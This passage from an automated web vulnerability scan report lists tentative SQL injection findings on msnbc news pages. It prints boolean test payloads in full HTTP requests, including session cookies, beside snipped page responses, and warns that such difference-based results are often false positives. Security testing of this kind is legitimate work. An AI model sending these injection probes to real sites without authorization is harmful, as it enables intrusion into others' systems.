                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

1.90. http://technolog.msnbc.redacted/mark-zuckerberg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /mark-zuckerberg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 48291817'%20or%201%3d1--%20 and 48291817'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mark-zuckerberg48291817'%20or%201%3d1--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:03:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40348

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=941345266&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=941345266&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /mark-zuckerberg48291817'%20or%201%3d2--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:03:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40332

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=548714074&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=548714074&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.91. http://technolog.msnbc.redacted/xbox [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /xbox

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /xbox'%20and%201%3d1--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:05:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40300

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=527795961&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=527795961&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /xbox'%20and%201%3d2--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40312

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=618466099&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=618466099&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.92. http://technolog.msnbc.redacted/xbox [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /xbox

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /xbox?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149332

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=670090030&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=670090030&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

Request 2

GET /xbox?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149342

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1469299940&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1469299940&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

1.93. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://today.msnbc.msn.com
Path:   /id/41319614/ns/today-entertainment/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41319614'%20and%201%3d1--%20/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=163
Date: Sun, 30 Jan 2011 03:01:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
e.","dateline":"LOS ANGELES","components":{"survey":null,"slices":[{"videos":[{"launch":41325432,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41318699,"plt":1,"plc":0,"settings":34245299,"settingsOverride":25067201,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41312381,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41311278,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"interactives":[{"headline":"Charlie Sheen\u0027s ups and downs","caption":"","credits":"TODAYshow.com","label":"Timeline","content":{"flashvars":{"omnitureInstanceName":"SheenTime","dataId":"CharlieSheen_timeline","_w":"1000","_h":"640"},"embedParams":{"width":"1000","height":"640","play":"true","loop":"true","menu":"false","quality":"Best","scale":"showall","salign":"tl","wmode":"opaque","bgcolor":"#FFFFFF","allowfullscreen":"true","allowscriptaccess":"always","allownetworking":"all"},"uri":"http://msnbcmedia.redacted/i/MSNBC/Components/Interactives/_templates/Timeline/timeline_template.swf","width":1000,"height":640,"typeName":"FlashInteractive","RenderAuthority":"-1075847500","ItemIndex":0},"archiveUri":"http://today.msnbc.redacted/id/41320098/ns/today-entertainment/","workbenchId":41320787,"typeName":"Interactive","RenderAuthority":"-1075847500","ItemIndex":0}],"typeName":"InteractiveSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"bridge":[{"workbenchId":35313411,"headline":"Talent and troubles follow Charlie Sheen","totalSlides":32,"firstSlide":{"headline":"WOLVERINES!","caption":"Charlie Sheen, born Carlos Estevez, got his movie start in 1984\u0027s 
\"Red Dawn.\" His fellow young stars included Patrick Swayze, C. Thomas Howell, Lea Thompson and Jennifer Grey.&#160;(MGM)","src":"http://msnbcmedia4.msn.com/j/MSNBC/Components/Slideshows/_production/ss-10020
...[SNIP]...

Request 2

GET /id/41319614'%20and%201%3d2--%20/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=180
Date: Sun, 30 Jan 2011 03:01:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133140


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
e.","dateline":"LOS ANGELES","components":{"survey":null,"slices":[{"videos":[{"launch":41325432,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41318699,"plt":1,"plc":0,"settings":34245299,"settingsOverride":25067201,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41312381,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41311278,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"interactives":[{"headline":"Charlie Sheen\u0027s ups and 